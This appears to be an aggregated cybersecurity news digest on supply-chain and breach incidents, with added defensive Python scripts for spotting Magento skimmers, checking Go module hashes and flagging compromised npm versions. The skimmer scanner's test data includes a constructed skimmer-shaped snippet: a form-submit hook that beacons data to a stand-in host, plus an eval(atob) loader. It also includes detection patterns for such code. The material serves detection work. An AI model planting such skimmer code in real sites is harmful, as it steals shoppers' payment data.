djohnson@CyberScoop - 59d
The US Treasury Department has confirmed a major cyber incident involving Chinese state-sponsored hackers who gained unauthorized access to employee workstations and unclassified documents. The breach occurred after a third-party software provider, BeyondTrust, was compromised, allowing the attackers to obtain a security key used for remote technical support. This key enabled the hackers to bypass security measures and remotely access Treasury systems and exfiltrate sensitive information. The Treasury was notified of the breach on December 8th and has been working with the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and other agencies to investigate the full impact of the incident.
The compromised BeyondTrust service has since been taken offline, and there is currently no evidence to suggest the threat actors still have access to Treasury systems. The Treasury Department has classified the incident as a “major incident” and has reaffirmed its commitment to bolstering cybersecurity defenses, highlighting the importance of addressing third-party vulnerabilities. The breach follows a series of other recent cyberattacks linked to China, further raising concerns about the security posture of the US government.
References:
- CyberScoop: Treasury workstations hacked by China-linked threat actors
- Federal News Network: Treasury says Chinese hackers remotely accessed workstations, documents in ‘major’ cyber incident
- siliconangle.com: Third-party provider hack exposes US Treasury Department unclassified documents
- Techmeme: Letter: the US Treasury says China-backed hackers gained access to some Treasury workstations and unclassified docs; a vendor notified it of the hack on Dec. 8 (Zack Whittaker/TechCrunch)
- bsky.app: Chinese state-sponsored hackers broke into the U.S. Treasury Department this month and stole documents from its workstations, according to a letter to lawmakers
- Chuck Darwin: US treasury’s workstations breached in cyber-attack by China – report A Chinese state-sponsored actor broke into the US treasury department earlier this month and stole documents from its workstations, according to a letter to lawmakers that was provided to Reuters on Monday.
- www.theguardian.com: US treasury’s workstations breached in cyber-attack by China – report
- techcrunch.com: US Treasury says China accessed government documents in ‘major’ cyberattack
- cyberscoop.com: Treasury workstations hacked by China-linked threat actors
- techcrunch.com: Letter: the US Treasury says China-backed hackers gained access to some Treasury workstations and unclassified docs; a vendor notified it of the hack on Dec. 8 (Zack Whittaker/TechCrunch)
- International homepage: ‘In a letter to 🇺🇸 Senate banking committee seen by the Financial Times, the department said it had been informed on December 8 by software company BeyondTrust that a hacker had breached several remote government workstations by obtaining a security key and had in turn gained access to unclassified documents on them.’
- www.benzinga.com: China-Linked Hackers Breach US Department Of Treasury
- malware.news: Chinese-sponsored hackers accessed Treasury documents in ‘major incident’
- www.cnn.com: CNN: China-backed hackers breached US Treasury workstations.
- Michael West: Treasury says Chinese hackers accessed workstations
- SiliconANGLE: Third-party provider hack exposes US Treasury Department unclassified documents
- www.pymnts.com: Treasury Department Workstations Breached by Hackers via Third-Party Vendor
- www.engadget.com: The US Treasury Department says it was hacked in a China-linked cyberattack
- federalnewsnetwork.com: Treasury says Chinese hackers remotely accessed workstations, documents in ‘major’ cyber incident
- WIRED: US Treasury Department confirms hack by China-backed group.
- bsky.app: The U.S. Treasury announced a major cyberattack linked to a compromised API key from its contractor, BeyondTrust.
- securityonline.info: Treasury Department Hit by Major Cybersecurity Incident, China Suspected
- PYMNTS.com: Treasury Department Workstations Breached by Hackers via Third-Party Vendor
- san.com: Chinese-sponsored hackers behind ‘major’ breach: Treasury Department
- securityaffairs.com: China-linked threat actors breached the U.S. Treasury Department by hacking a remote support platform used by the agency.
- Hong Kong Free Press HKFP: US Treasury says was targeted by China state-sponsored cyberattack.
- The Hacker News: The United States Treasury Department said it suffered a 'major cybersecurity incident' that allowed suspected Chinese threat actors to remotely access some computers and unclassified documents.
- Fortune | FORTUNE: Treasury Department says a China state-sponsored cyberattack gained access to workstations and documents
- gbhackers.com: US Treasury Department Breach, Hackers Accessed Workstations.
- SAN: Investigators accuse China of hacking U.S. Treasury Department computers.
- blog.gitguardian.com: What Happened in the U.S. Department of the Treasury Breach? A Detailed Summary.
- DataBreaches.Net: Chinese hackers breached Treasury Department workstations, documents in ‘major cybersecurity incident’.
- go.theregister.com: US Treasury Department outs the blast radius of BeyondTrust's key leak
- www.wired.com: US Treasury Department admits it got hacked by China. Treasury says hackers accessed “certain documents” in a “major” breach, but experts believe the attack’s impacts could prove to be more significant as new details emerge.
- www.bleepingcomputer.com: US Treasury Department breached through remote support platform
- Hacker News: US Treasury Department breached through remote support platform
- OODAloop: What to know about string of US hacks blamed on China
- Techmeme: Sources: Chinese government hackers breached the US Treasury Department's OFAC, which administers economic sanctions, and two other Treasury offices (Washington Post)
- Dataconomy: According to the Washington Post Chinese government hackers compromised the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) in December, targeting intelligence related to economic sanctions, officials reported.
- Carly Page: China-backed hackers reportedly compromised the US Treasury’s highly sensitive sanctions office during December cyberattack
- techcrunch.com: Chinese government hackers targeted the U.S. Treasury’s highly sensitive sanctions office during a December cyberattack, according to reports.
- techcrunch.com: Chinese government hackers targeted US Treasury’s sanctions office during December cyberattack
- Cybernews: On Thursday, it was revealed that PRC-backed hackers behind last month’s US Treasury hack accessed some senior officials' laptops.
- Bloomberg Technology: Sources: China-backed hackers accessed the computers of senior US Treasury officials; the department's email system and classified data were not breached (Bloomberg)
- www.techmeme.com: Sources: China-backed hackers accessed the computers of senior US Treasury officials; the department's email system and classified data were not breached (Bloomberg)
- Techmeme: Sources: China-backed hackers accessed the computers of senior US Treasury officials; the department's email system and classified data were not breached (Bloomberg)
- The Hacker News: CISA: No Wider Federal Impact from Treasury Cyber Attack, Investigation Ongoing
- www.helpnetsecurity.com: CISA says Treasury was the only US agency breached via BeyondTrust
- www.the420.in: Chinese APT Exploits BeyondTrust Vulnerability to Breach U.S. Treasury Systems
- Pyrzout: CISA says Treasury was the only US agency breached via BeyondTrust
- Help Net Security: CISA says Treasury was the only US agency breached via BeyondTrust
- industrialcyber.co: US Treasury sanctions Beijing’s Integrity Tech for Flax Typhoon cyber intrusions on critical infrastructure
- ciso2ciso.com: CISA: Third-Party Data Breach Limited to Treasury Dept. – Source: www.darkreading.com
- Latest from TechRadar: Chinese cybersecurity firm hit by US sanctions over ties to Flax Typhoon hacking group
Pierluigi Paganini@securityaffairs.com - 17d
Hackers are exploiting Google Tag Manager (GTM) to deploy credit card skimmers on Magento-based e-commerce websites. According to reports from The Hacker News, Sucuri, and CISO2CISO, malicious actors are leveraging GTM to deliver malware that targets sensitive payment data. The attack involves injecting code that appears to be a standard GTM or Google Analytics script but contains an obfuscated backdoor. This allows the attackers to gain persistent access to the websites.
Sucuri's investigation into a customer's Magento site revealed that credit card details were being stolen via a skimmer loaded from the cms_block.content database table. The GTM tag contained encoded JavaScript designed to collect and transmit sensitive user data entered during the checkout process to a remote server controlled by the attackers. This highlights the importance of securing third-party integrations and regularly monitoring website files for any suspicious code.
References:
- Sucuri Blog: Sucuri warns of credit card data theft from website.
- ciso2ciso.com: Hackers Exploit Google Tag Manager
- The Hacker News: The Hacker News reports on hackers exploiting Google Tag Manager to deploy credit card skimmers.
- Sucuri: Sucuri warns of credit card data theft from a customer's Magento-based eCommerce website. The credit card skimmer malware is delivered by leveraging Google Tag Manager (GTM). GTM is a free tool from Google that allows website owners to manage and deploy marketing tags on their website without needing to modify the site’s code directly.
- ciso2ciso.com: Hackers Exploit Google Tag Manager to Deploy Credit Card Skimmers on Magento Stores – Source:thehackernews.com
- securityaffairs.com: Sucuri researchers observed threat actors leveraging Google Tag Manager (GTM) to install e-skimmer software on Magento-based e-stores.
- Security Intelligence: Threat actors have been observed leveraging Google Tag Manager (GTM) to deliver credit card skimmer malware targeting Magento-based e-commerce websites.
- www.scworld.com: Magento stores compromised with Google Tag Manager skimmer
- gbhackers.com: Information on hackers exploiting Google Tag Manager to steal credit card data from e-commerce sites.
- securityonline.info: SecurityOnline article on hackers exploiting Google Tag Manager.
- gbhackers.com: Hackers Exploiting Google Tag Managers to Steal Credit Card from eCommerce Sites
- securityonline.info: Hackers Exploit Google Tag Manager to Steal Credit Card Data from Magento Sites
- Sucuri Blog: Recently, we had a client come to us concerned that their website was infected with credit card stealing malware, often referred to as MageCart. Their website was running on Magento, a popular eCommerce content management system that skilled attackers often target to steal as many credit card numbers as possible.
- Search Engine Journal: Hackers Use Google Tag Manager to Steal Credit Card Numbers
- www.searchenginejournal.com: Hackers Use Google Tag Manager to Steal Credit Card Numbers
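The Sucuri finding above, a skimmer stored in the cms_block.content table and dressed up as a GTM snippet, suggests a straightforward defensive check: pull every cms_block row and flag inline scripts that show obfuscation primitives or a form-event hook feeding a network sink. The script below is an added example, not Sucuri's or Magento's code. The cms_block rows are constructed for illustration (the base64 payload is a harmless placeholder and GTM-XXXXXXX is a dummy container ID); in practice you would feed it the rows returned by `SELECT identifier, content FROM cms_block`.

```python
import re
from typing import Dict, Iterable, List, Tuple

# Heuristics: a genuine GTM loader has none of these; a skimmer hidden in one usually has several.
SCRIPT_TAG = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
GTM_MARKER = re.compile(r"googletagmanager\.com|\bGTM-[A-Z0-9]{4,}\b|dataLayer")
OBFUSCATION = re.compile(r"\b(?:eval|atob|unescape)\s*\(|String\.fromCharCode|\\x[0-9a-fA-F]{2}")
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
FORM_HOOK = re.compile(r"addEventListener\(\s*['\"](?:submit|keyup|change|input)['\"]")
EXFIL_SINK = re.compile(r"new\s+Image\(\)\.src|navigator\.sendBeacon|XMLHttpRequest|\bfetch\s*\(")

# Constructed sample rows in the shape of Magento's cms_block table: (identifier, content).
SAMPLE_CMS_BLOCKS: List[Tuple[str, str]] = [
    ("footer_links", '<div class="footer"><a href="/privacy">Privacy</a></div>'),
    # The standard GTM container snippet: must NOT be flagged.
    ("gtm_head",
     "<!-- Google Tag Manager -->\n"
     "<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});"
     "var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;"
     "j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);})"
     "(window,document,'script','dataLayer','GTM-XXXXXXX');</script>"),
    # A GTM lookalike with an eval(atob(...)) stage; the base64 text is a placeholder, not a payload.
    ("promo_banner",
     "<script src='https://www.googletagmanager.com/gtm.js?id=GTM-XXXXXXX'></script>\n"
     "<script>eval(atob('QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eg=='));</script>"),
    # Hex-escaped field names plus a submit hook that beacons form data out: classic skimmer shape.
    ("checkout_note",
     r"<script>var _0x4a=['\x63\x63\x5f\x6e\x75\x6d'];"
     r"document.addEventListener('submit',function(){new Image().src='https://example.invalid/c?d='+btoa(JSON.stringify(_0x4a))});</script>"),
]


def inspect_script(body: str) -> List[str]:
    """Return the reasons one inline <script> body looks like a skimmer (empty list if clean)."""
    reasons: List[str] = []
    if OBFUSCATION.search(body):
        reasons.append("obfuscation primitive (eval/atob/unescape/fromCharCode/hex escapes)")
    if LONG_BASE64.search(body):
        reasons.append("long base64-like literal")
    if FORM_HOOK.search(body) and EXFIL_SINK.search(body):
        reasons.append("form-event hook combined with a network sink")
    return reasons


def scan_cms_blocks(rows: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Map each suspicious cms_block identifier to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for identifier, content in rows:
        reasons: List[str] = []
        for match in SCRIPT_TAG.finditer(content):
            reasons.extend(inspect_script(match.group(1)))
        if reasons:
            # Note when the suspicious block also carries GTM markers, the disguise Sucuri described.
            if GTM_MARKER.search(content):
                reasons.insert(0, "block is dressed up as a Google Tag Manager snippet")
            findings[identifier] = reasons
    return findings


if __name__ == "__main__":
    for block_id, why in scan_cms_blocks(SAMPLE_CMS_BLOCKS).items():
        print(f"{block_id}:")
        for reason in why:
            print(f"  - {reason}")
```

The heuristics are deliberately conservative: the legitimate container loader is left alone, while a block earns a finding only on an obfuscation primitive, an unusually long base64 literal, or the combination of a form hook with an outbound sink. Pair this with a baseline of the expected cms_block identifiers so that a newly appearing block is itself a signal.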
MalBot@malware.news - 69d
A supply chain attack has compromised open-source packages associated with rspack and vant, injecting cryptomining malware. The compromised packages had hundreds of thousands of weekly downloads, posing a significant threat to users of these projects. The affected version is 1.1.7. This event underscores the growing threat of supply chain attacks targeting open-source software projects. The incident emphasizes the need for stronger security protocols in open-source ecosystems and for better vetting of dependencies.
References:
- malware.news: Open source in the crosshairs: New cryptomining hacks highlight key threat
- The Hacker News: TheHackerNews article about Rspack npm packages compromised with crypto mining malware.
- AAKL: Socket, from yesterday: Supply Chain Attack on Rspack npm Packages Injects Cryptojacking Malware More:
- Security Risk Advisors: Supply Chain Attack on Rspack npm Packages Deploys Cryptojacking Malware
- Blog (Main): ReversingLabs reports on cryptomining hacks in open source projects.
- socket.dev: Open source in the crosshairs: New cryptomining hacks highlight key threat
- www.bleepingcomputer.com: Three popular npm packages, @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing threat actors to publish malicious versions that installed cryptominers.
- Osint10x: Rspack npm Packages Compromised with Crypto Mining Malware in Supply Chain Attack
- Osint10x: OSINT10X reports on cryptomining hacks on open source packages.
- BleepingComputer: Three popular npm packages, @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing threat actors to publish malicious versions that installed cryptominers.
- Security Boulevard: OSS in the crosshairs: Cryptomining hacks highlight key new threat
- 2024 Sonatype Blog: npm packages from Rspack, Vant compromised, blocked by Sonatype
- www.npmjs.com: npm packages from Rspack, Vant compromised, blocked by Sonatype
- malware.news: Supply chain attack compromises rspack, Vant packages with XMRig cryptominer
- securityonline.info: Rspack Supply Chain Attack Injects Cryptojacking Malware Into npm Ecosystem
- www.scworld.com: Supply chain attack compromises rspack, Vant packages with XMRig cryptominer
- osint10x.com: Supply Chain Attack Hits Rspack, Vant npm Packages with Monero Miner
- Osint10x: Supply Chain Attack Hits Rspack, Vant npm Packages with Monero Miner
- hackread.com: Supply Chain Attack Hits Popular Rspack and Vant npm Packages with Monero Miner
Jessica Lyons@theregister.com - 23d
Researchers at watchTowr Labs have uncovered a significant security flaw involving abandoned Amazon Web Services (AWS) S3 buckets, potentially allowing attackers to compromise the software supply chain. The analysis revealed that nearly 150 S3 buckets previously used by various organizations, including cybersecurity firms, governments, Fortune 500 companies, and open source projects, could be re-registered. This re-registration could enable attackers to inject malicious code or executables into deployment processes and software update mechanisms.
Over a two-month period, these abandoned buckets received over eight million HTTPS requests for various files, including software updates and other binary artifacts. The requests originated from a wide range of sources, including government networks in multiple countries, military networks, Fortune 100 and 500 companies, and even cybersecurity companies. This vulnerability could allow threat actors to deliver malware or backdoors to these organizations, leading to widespread security breaches. AWS has since blocked the specific buckets identified by watchTowr to prevent their re-creation and potential misuse.
References:
- The Register - Security: Abandoned AWS S3 buckets can be reused in supply-chain attacks that would make SolarWinds look 'insignificant'
- watchTowr: Abandoned AWS S3 buckets could be reused to conduct supply chain attacks.
- go.theregister.com: Abandoned AWS S3 buckets can be reused in supply-chain attacks that would make SolarWinds look 'insignificant' When cloud customers don't clean up after themselves, part 97 Abandoned AWS S3 buckets could be reused to hijack the global software supply chain in an attack that would make Russia's "SolarWinds adventures look amateurish and insignificant," watchTowr Labs security researchers have claim…
- www.theregister.com: watchTowr : Abandoned AWS S3 buckets could be reused to conduct supply chain attacks.
- labs.watchtowr.com: WatchTowr Labs research details 8 million requests against AWS S3 buckets.
- www.csoonline.com: Code references to nonexistent cloud assets continue to pose significant security risks, and the problem is only growing. Recent research identified approximately 150 AWS S3 storage buckets once used by various software projects to host sensitive scripts, configuration files, software updates, and other binary artifacts that were automatically downloaded and executed on user machines.
- www.scworld.com: Nearly 150 S3 buckets previously leveraged by cybersecurity firms, governments, Fortune 500 companies, and open source projects could be re-registered with the same AWS account name to facilitate executable and/or code injections in the deployment code/software update mechanism, according to an analysis from watchTowr Labs researchers.
- www.securityweek.com: Abandoned Amazon S3 Buckets Enabled Attacks Against Governments, Big Firms
- BleepingComputer: How attackers abuse S3 Bucket Namesquatting — And How to Stop Them
- SecurityWeek: Abandoned Amazon S3 Buckets Enabled Attacks Against Governments, Big Firms
- therecord.media: Researchers warn of risks tied to abandoned cloud storage buckets
- Jon Greig: Researchers at Watchtowr warned of malicious actors taking over abandoned AWS S3 buckets used by governments, militaries, Fortune 500 companies and even some cybersecurity firms
- darkreading: Researchers from watchTowr discovered around 150 Amazon Web Services S3 buckets that were formerly used by organizations for software deployment and updates but were then abandoned.
Jeff Burt@DevOps.com - 23d
A malicious package imitating the popular BoltDB module has been discovered in the Go ecosystem. This package contains a backdoor that enables remote code execution, posing a significant security risk to developers using the compromised module. The malicious package, a typosquat of BoltDB, was discovered by researchers at Socket, an application security company.
This attack exploits the Go Module Mirror's caching mechanism, allowing the malware to persist undetected despite manual code reviews. After the malware was cached by the Go Module Mirror, the git tag was strategically altered on GitHub to remove traces of malicious code and hide it from manual review. To mitigate software supply-chain threats, Socket advises developers to verify package integrity before installation, analyze dependencies for anomalies, and use security tools that inspect installed code at a deeper level.
References:
- ciso2ciso.com: Source: thehackernews.com. Cybersecurity researchers have called attention to a software supply chain attack targeting the Go ecosystem that involves a malicious package capable of granting the adversary remote access to infected systems.
- lobste.rs: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
- The Hacker News: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
- bsky.app: Socket Security has discovered a malicious Go module for the BoltDB database that contains a hidden backdoor. The module is cached in the Go Module Mirror, the first documented attack making it into the Go Module Mirror despite manual code reviews. https://socket.dev/blog/malicious-package-exploits-go-module-proxy-caching-for-persistence
- ciso2ciso.com: Malicious Go Package Exploits Module Mirror Caching for Persistent Remote Access
- fosstodon.org: Socket: Go Supply Chain Attack: Malicious Package Exploits Go Module Proxy Caching for Persistence
- DevOps.com: Typosquat Supply Chain Attack Targets Go Developers
- securityonline.info: Socket researchers have discovered a malicious typosquatting package in the Go ecosystem that exploits the Go Module Proxy’s
- www.infoworld.com: Malicious package found in the Go ecosystem
- ciso2ciso.com: Malicious package found in the Go ecosystem – Source: www.infoworld.com
- ciso2ciso.com: Source: www.infoworld.com. The malicious package, a typosquat of the popular BoltDB module, is said to be among the first known exploits of the Go Module Mirror’s indefinite module caching.
- heise online English: Typosquatting in the Go ecosystem: Fake BoltDB package discovered A malicious package in the Go ecosystem imitates BoltDB and contains a backdoor. Attackers used the caching service to spread the malware unnoticed.
- www.heise.de: Typosquatting in the Go ecosystem: Fake BoltDB package discovered
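The caching behaviour described above means the copy the Go Module Mirror serves can differ from what the repository tag shows on GitHub, so a manual review of the tag proves little. The check that actually matters is to hash the tree you reviewed and compare it with the `h1:` hash recorded in go.sum, which is the hash of what the proxy served; a mismatch tells you the two trees are not the same code. The Python script below is an added example, not code from Socket or the Go project. It reimplements the Go module `h1:` hash format (the Hash1 algorithm used by golang.org/x/mod/sumdb/dirhash) and assumes the caller supplies the file tree (for example a checkout of the tagged commit with `.git` and `vendor` excluded, which module zips also omit) together with the `module@version` name prefix that module zips use; `load_tree` and `check_against_gosum` are helpers written for this example.

```python
import base64
import hashlib
import os
from typing import Dict, Optional, Tuple


def hash1(prefix: str, files: Dict[str, bytes]) -> str:
    """Go module hash in the 'h1:' format (dirhash.Hash1).

    Each file contributes the line "<sha256 of content, hex>  <prefix>/<path>\\n";
    lines are ordered by file name, concatenated, hashed with SHA-256 and the
    digest is base64-encoded. Module zips name files "example.com/m@v1.2.3/pkg/file.go".
    """
    summary = []
    for rel in sorted(files):                      # Go sorts the file names first
        name = f"{prefix}/{rel}" if prefix else rel
        summary.append(f"{hashlib.sha256(files[rel]).hexdigest()}  {name}\n")
    digest = hashlib.sha256("".join(summary).encode("utf-8")).digest()
    return "h1:" + base64.b64encode(digest).decode("ascii")


def load_tree(root: str, skip=(".git", "vendor")) -> Dict[str, bytes]:
    """Read a checkout into {posix/relative/path: bytes}, skipping VCS and vendor dirs.
    Helper written for this example, not part of the Go toolchain."""
    tree: Dict[str, bytes] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in skip]
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                tree[rel] = fh.read()
    return tree


def recorded_hash(gosum_text: str, module: str, version: str) -> Optional[str]:
    """Return the h1 hash go.sum records for module@version (the zip line, not the /go.mod line)."""
    for line in gosum_text.splitlines():
        parts = line.split()
        if len(parts) == 3 and parts[0] == module and parts[1] == version:
            return parts[2]
    return None


def check_against_gosum(gosum_text: str, module: str, version: str,
                        files: Dict[str, bytes]) -> Tuple[str, Optional[str], bool]:
    """Hash the reviewed tree and compare with go.sum.
    Returns (computed, recorded, match); match=False means the proxy served different code."""
    computed = hash1(f"{module}@{version}", files)
    recorded = recorded_hash(gosum_text, module, version)
    return computed, recorded, computed == recorded


if __name__ == "__main__":
    # Constructed demo: the tree the proxy served carries an extra file the reviewed tag lacks.
    module, version = "example.com/m", "v1.0.0"
    reviewed = {"go.mod": b"module example.com/m\n\ngo 1.21\n", "m.go": b"package m\n"}
    served = dict(reviewed, **{"init.go": b"package m\n"})  # placeholder, not a real payload
    gosum = f"{module} {version} {hash1(f'{module}@{version}', served)}\n"
    computed, recorded, ok = check_against_gosum(gosum, module, version, reviewed)
    print("reviewed tree:", computed)
    print("go.sum records:", recorded)
    print("MATCH" if ok else "MISMATCH: proxy copy differs from the reviewed tree")
```

Run it against a real checkout with `load_tree("/path/to/checkout")` and the go.sum from the consuming project. Because go.sum (and the checksum database) record whatever the proxy cached on first request, a matching hash confirms consistency, not safety; the value of the check is the mismatch case, which is exactly the condition the BoltDB typosquat relied on.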
info@thehackernews.com (The Hacker News)@The Hacker News - 17d
The cybercrime group XE Group has shifted its tactics from credit card skimming to exploiting zero-day vulnerabilities, with a recent focus on VeraCore software. This involves deploying reverse shells and web shells to maintain persistent remote access to compromised systems, targeting supply chains in the manufacturing and distribution sectors. The group has been active since at least 2010, marking a significant shift in their operational priorities towards targeted information theft.
The vulnerabilities exploited include CVE-2024-57968, an unrestricted file upload flaw, and CVE-2025-25181, an SQL injection vulnerability. These shortcomings are being chained to deploy ASPXSpy web shells for unauthorized access to infected systems, enabling file system enumeration, data exfiltration, and the execution of SQL queries. The exploitation activity was discovered in November 2024, with evidence suggesting the group leveraged CVE-2025-25181 as early as 2020.
References:
- securityaffairs.com: XE Group shifts from credit card skimming to exploiting zero-days
- The Hacker News: XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells
- ciso2ciso.com: XE Hacker Group Exploits VeraCore Zero-Day to Deploy Persistent Web Shells – Source:thehackernews.com
- Blog: Article about the XE group exploiting Veracore zero-day to deploy persistent web shells.
- www.scworld.com: Report details how XE Group exploited a VeraCore zero-day to deploy reverse shells and web shells.
- SOC Prime Blog: SOCRadar: Detect XE Group Attacks
- intezer.com: Intezer's Nicole Fishbein, Joakim Kennedy & Justin Lentz provide an in-depth analysis of XE Group’s recent operations, looking at the exploits used, persistence mechanisms, and attack methodologies.
- socprime.com: XE Group, likely a Vietnam-linked hacking collective that has been active in the cyber threat arena for over a decade, is believed to be behind the exploitation of a couple of VeraCore zero-day vulnerabilities.
- Virus Bulletin: Intezer's Nicole Fishbein, Joakim Kennedy & Justin Lentz provide an in-depth analysis of XE Group’s recent operations, looking at the exploits used, persistence mechanisms, and attack methodologies.
- securityaffairs.com: The cybercrime group XE Group exploited a VeraCore zero-day to deploy reverse shells, web shells in recent attacks.
- securityaffairs.com: Analysis of the XE Group's recent operations and their use of VeraCore zero-day vulnerabilities to deploy reverse shells and web shells.
@feeds.feedburner.com - 81d
A critical security flaw has been discovered in versions 1.95.6 and 1.95.7 of the widely used @solana/web3.js npm library, a JavaScript tool crucial for Solana blockchain applications. This supply chain attack, affecting over 350,000 weekly downloads, injected malicious code designed to steal private keys. The compromised code, concealed within legitimate code paths, exfiltrated private keys to a hardcoded Solana address (FnvLGtucz4E1ppJHRTev6Qv4X7g8Pw6WPStHCcbAKbfx) via Cloudflare headers, potentially leading to cryptocurrency theft from both developers and end-users. The attack, believed to stem from a phishing or social engineering campaign against library maintainers, underscores the vulnerability of software supply chains in the crypto space.
Developers are strongly urged to immediately update to version 1.95.8 or downgrade to version 1.95.5 of the @solana/web3.js library. Those who suspect their keys may be compromised are advised to rotate their authority keys. The compromised versions are no longer available for download. While non-custodial wallets are not affected, this incident highlights the serious risks associated with compromised open-source libraries and the importance of vigilant security practices within the development ecosystem. The compromised versions, which attracted over 50 million downloads, were identified and reported across several cybersecurity news outlets including Malware News, BleepingComputer, Cyber Insider, and The Hacker News.
References:
- The Hacker News: The Hacker News discusses the backdoor discovered in Solana's Web3.js npm library.
- Help Net Security: Solana’s popular web3.js library backdoored in supply chain compromise
- CyberInsider: Supply chain attack on Solana core library
- www.bleepingcomputer.com: Solana's web3.js library was backdoored to steal secret private keys via a supply chain attack, affecting cryptocurrency wallets.
- socket.dev: Supply chain attack: Solana web3.js library
- bsky.app: The legitimate Solana JavaScript SDK was temporarily compromised by a supply chain attack, resulting in malicious code stealing cryptocurrency private keys.
- malware.news: Malware News reports on the malware found in Solana's npm library with 50M downloads.
- www.bleepingcomputer.com: BleepingComputer reports on the malicious Solana packages found on npm.
- bsky.app: Analysis of the Solana package revealed malicious URLs designed to exfiltrate private keys.
- Security Risk Advisors: Supply Chain Attack Compromises Solana’s web3.js Library, Targets Private Keys
- sra.io: SRA.io article mentioning the Solana vulnerability.
- arstechnica.com: Backdoor slipped into popular code library, drains ~$155k from digital wallets | Ars Technica "The backdoor came in the form of code that collected private keys and wallet addresses when apps that directly handled private keys incorporated solana-web3.js versions 1.95.6 and 1.95.7. These backdoored versions were available for download during a five-hour window between 3:20 pm UTC and 8:25 pm UTC on Tuesday"
- www.heise.de: Supply chain attack: Solana web3.js library was infected with malicious code Unknown attackers have equipped Solana's JavaScript SDK with malicious code to steal private keys.
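The rspack/vant compromise (version 1.1.7) and the @solana/web3.js compromise (versions 1.95.6 and 1.95.7) both come down to the same question for a defender: is a known-bad version pinned anywhere in my lockfile, including nested under another dependency where `npm ls` output is easy to miss? The script below is an added example, not code from npm, Socket or any of the cited outlets. It reads a package-lock.json in either the v1 nested `dependencies` shape or the v2/v3 flat `packages` map. The KNOWN_BAD table holds only the versions the page names (Vant is omitted because its affected version is not stated here), and the sample lockfile is constructed for illustration.

```python
import json
import sys
from typing import Dict, Iterable, List, Set, Tuple

# Versions named on the page as compromised. Extend this from vendor advisories;
# Vant is left out because the page does not give its affected version.
KNOWN_BAD: Dict[str, Set[str]] = {
    "@rspack/core": {"1.1.7"},
    "@rspack/cli": {"1.1.7"},
    "@solana/web3.js": {"1.95.6", "1.95.7"},
}

# Constructed sample lockfile (v3): one bad version hidden under another package.
SAMPLE_LOCK = json.loads("""{
  "name": "example-app", "lockfileVersion": 3, "requires": true,
  "packages": {
    "": {"name": "example-app", "version": "0.1.0"},
    "node_modules/@rspack/core": {"version": "1.1.8"},
    "node_modules/some-wallet-ui": {"version": "2.0.0"},
    "node_modules/some-wallet-ui/node_modules/@solana/web3.js": {"version": "1.95.6"},
    "node_modules/vant": {"version": "4.9.15"}
  }
}""")


def _name_from_path(path: str) -> str:
    """Lockfile v2/v3 keys look like 'node_modules/a/node_modules/@scope/b'; keep the last segment."""
    return path.rsplit("node_modules/", 1)[-1]


def iter_locked_packages(lock: dict) -> Iterable[Tuple[str, str, str]]:
    """Yield (name, version, location) for every installed package in a package-lock.json."""
    if "packages" in lock:                      # lockfileVersion 2 or 3: flat map keyed by path
        for path, meta in lock["packages"].items():
            if path == "":                      # the root project itself
                continue
            yield _name_from_path(path), meta.get("version", ""), path
        return

    def walk(deps: dict, trail: str):           # lockfileVersion 1: nested tree
        for name, meta in deps.items():
            loc = f"{trail}/{name}" if trail else name
            yield name, meta.get("version", ""), loc
            yield from walk(meta.get("dependencies", {}), loc)

    yield from walk(lock.get("dependencies", {}), "")


def find_compromised(lock: dict, known_bad: Dict[str, Set[str]] = KNOWN_BAD) -> List[Tuple[str, str, str]]:
    """Return every (name, version, location) whose pinned version is on the known-bad list."""
    return [(name, version, loc)
            for name, version, loc in iter_locked_packages(lock)
            if version in known_bad.get(name, set())]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            lock = json.load(fh)
    else:
        lock = SAMPLE_LOCK
    hits = find_compromised(lock)
    for name, version, loc in hits:
        print(f"COMPROMISED {name}@{version} at {loc}")
    sys.exit(1 if hits else 0)
```

The non-zero exit status lets the check sit in CI next to `npm ci`, so a lockfile that pins a withdrawn version fails the build rather than silently installing whatever is still in a private mirror or cache.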
info@thehackernews.com (The Hacker News)@The Hacker News - 52d
Ethereum developers are being targeted by a supply chain attack involving malicious npm packages designed to look like legitimate Hardhat plugins. These fake packages, with names closely resembling real ones, are being used to steal sensitive data, including private keys and mnemonics. Researchers have identified at least 20 of these malicious packages, which have collectively been downloaded over 1,000 times. The attack exploits trust in the open-source ecosystem, specifically within the npm registry. Once installed, the malicious packages use Hardhat runtime functions to collect sensitive information and transmit it to attacker-controlled endpoints.
The attackers are using Ethereum smart contracts to store and distribute Command & Control (C2) server addresses, making it more difficult to disrupt their infrastructure. This strategy, combined with using hardcoded keys and Ethereum addresses, enables efficient data exfiltration. The campaign is attributed to a Russian-speaking threat actor known as "_lain." The compromised development environments could lead to backdoors in production systems and significant financial losses for affected developers. Developers are urged to verify package authenticity, inspect source code, and exercise caution when using package names.
References:
- ciso2ciso.com: Malicious npm packages target Ethereum developers – Source: securityaffairs.com
- securityaffairs.com: Malicious npm packages target Ethereum developers
- The Hacker News: Cybercriminals Target Ethereum Developers with Fake Hardhat npm Packages
- gbhackers.com: Malicious npm Packages Stealing Developers’ Sensitive Data
- osint10x.com: Russian-Speaking Attackers Target Ethereum Devs with Fake Hardhat npm Packages
